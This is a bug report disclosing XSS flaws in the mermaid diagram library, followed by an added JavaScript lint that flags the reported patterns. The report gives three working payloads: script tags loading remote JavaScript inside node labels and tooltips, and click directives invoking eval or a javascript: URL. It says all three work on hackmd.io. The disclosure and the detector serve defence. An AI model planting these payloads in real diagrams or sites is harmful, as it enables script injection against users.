Closed
Labels
Type: Bug / Error (Something isn't working or is incorrect)
Description
Hi, I found XSS issues in mermaid. This affects all the projects that use mermaid.
There are three different ways to trigger it.
The first one:
graph TD
B --> C{<script src=https://www.google-analytics.com/gtm/js?id=GTM-TQ6RV7G ></script>}
The second one:
graph LR;
A-->B;
click B callback "<script src=https://www.google-analytics.com/gtm/js?id=GTM-TQ6RV7G ></script>"
The third one (needs a click; both nodes will work):
graph LR;
alert`md5_salt`-->B;
click alert`md5_salt` eval "Tooltip for a callback"
click B "javascript:alert`salt`" "This is a tooltip for a link"
Here is an example that affects other projects which use mermaid.
hackmdio/codimd#1233
And all three payloads above would work on hackmd.io.
Hope you can fix this soon!
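
A triage lint for stored diagram sources covering the three shapes reported above, as an added example that is not part of the original issue or of mermaid's code. `lintMermaid`, the rule ids and the sample diagram are constructed here, and it assumes the `click <node> <callback | "url"> "tooltip"` syntax shown in the report; it flags diagrams for review and is not a sanitizer.

```javascript
// Added example: flags Mermaid source lines that match the three reported
// shapes so stored diagrams can be reviewed. Hypothetical helper, not mermaid API.
const RULES = [
  // 1. HTML markup in diagram text (node labels, tooltips). <br> is exempt
  //    because it is commonly used for line breaks in labels.
  { id: 'html-tag', re: /<\s*\/?\s*(?!br\s*\/?\s*>)[a-z][^>]*>/i },
  // 2. click directive whose quoted link target uses a script-capable scheme.
  { id: 'click-script-url',
    re: /^\s*click\s+\S+\s+"\s*(?:javascript|data|vbscript)\s*:/i },
  // 3. click directive whose second argument is a bare name, i.e. a callback
  //    that is looked up and invoked in the page when the node is clicked.
  { id: 'click-callback', re: /^\s*click\s+\S+\s+(?!")\S+/i },
];

// Returns [{ line, rule }] for every rule hit, with 1-based line numbers.
function lintMermaid(source) {
  const findings = [];
  source.split(/\r?\n/).forEach((text, i) => {
    for (const { id, re } of RULES) {
      if (re.test(text)) findings.push({ line: i + 1, rule: id });
    }
  });
  return findings;
}

// Constructed sample input: one line per reported shape plus benign lines.
const SAMPLE = [
  'graph LR;',
  'A-->B;',
  'B --> C{<script src=https://example.invalid/x.js></script>}',
  'click A callback "<b>tip</b>"',
  'click B "javascript:void(0)" "Tooltip for a link"',
  'click C "https://example.invalid/docs" "Plain link"',
  'D[first line<br/>second line]',
].join('\n');

for (const f of lintMermaid(SAMPLE)) {
  console.log(`line ${f.line}: ${f.rule}`);
}
```

A hit on `click-callback` is a prompt to check which page-global functions are reachable, since the report shows the callback name alone deciding what runs.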